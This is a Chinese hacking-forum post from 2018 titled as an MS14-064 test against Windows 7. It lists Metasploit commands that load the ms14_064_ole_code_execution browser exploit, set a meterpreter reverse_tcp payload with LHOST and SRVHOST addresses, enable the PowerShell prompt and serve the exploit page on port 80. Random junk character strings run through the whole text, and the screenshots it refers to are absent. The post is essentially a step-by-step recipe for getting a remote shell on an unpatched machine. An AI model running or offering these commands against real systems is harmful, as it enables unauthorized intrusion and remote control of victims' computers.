找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1420|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

$ o3 v$ f& h% P1 ?( C) X8 g 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 9 p- I6 q0 O. q, `3 C

9 }& Q# s' I, U% E7 S! L8 o

) n, F. n4 ], e7 u$ l 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 7 |" t% e/ y+ V9 q: m/ O# ^8 E

+ R3 O0 r( B% d7 A9 L: x

" M4 K |6 u2 x c) F# I 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp: h9 {& a7 f2 }9 v% G: \

4 i) ~2 K( M$ U z6 n

3 @# w- P4 H/ Y+ k             set AllowPowershellPrompt true. u \- y% P3 _; {

2 l; @$ w1 E+ ?. Y+ m, q

) V- v$ H# h* c5 v9 m H! W             Set LHOST 192.168.0.109 * p, M0 H0 N# N1 |! @' F

6 X: A1 m0 y( a4 S& @ n: k

/ T6 Q$ w" D P! A             set SRVHOST 192.168.0.1090 G" B* K& Z4 u0 L* F

, k7 u3 |4 X. Y# Y; P! E9 [

! X) e6 x( O0 X$ _+ S$ G             Set uripath share! f" T$ K( z5 m9 h- J

! t# T8 M# v4 k, Y

1 l% G% Y3 ~# B. V* L. C, M" p! n             Set srvport 80 7 N: G7 I8 W9 ?# C: O/ U0 \

1 K9 L! ~' M& @: T( f: N

; M: G+ ?5 x6 J5 Z: K. q, n9 y  - @( s! a3 A9 z2 R% F- _

( Q# c. Q" V/ T1 |8 f8 S+ W

" p" L7 `- W0 J) e. [   6 _/ z8 z" e4 R. K& o# b7 D

) S& O0 `. {/ D0 @& r; G) D( o: A

! ^0 k0 \5 E9 a& [# P8 e d   ! s9 a6 p- T5 l" M* g0 Y- q

d7 W7 d, {( y; k& C

7 }8 {( j# R1 C+ A! g% V% j  2 C4 x3 e3 h( f) L$ }

, |' R: V* u1 ^; p: B

# Y$ J3 |7 W& Q. j' O   + @8 J+ A& _' X, \% u3 o# S

0 H" y2 w1 Y6 m/ N5 {! i* G

: m, i" j& |- }6 } c 下面我们来访问本地地址如图: 8 x g/ ?) J' f$ T: W1 b

) S4 d1 u9 j, \! h, W

/ U7 E: k# a: Q; ~8 ^& E# v6 `   " L, ]$ Y0 N) a0 V+ Q8 b7 Y

4 Y) w+ s2 F! n3 V x5 Q

8 \1 H* C" d+ t, b( Z   1 Q& `9 l2 l* K. d( Z5 d

+ i8 ~1 H, p* S8 N! e6 @

+ D, b( E5 K7 Y& z: ?' H% b - k O# @: T) o2 f

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表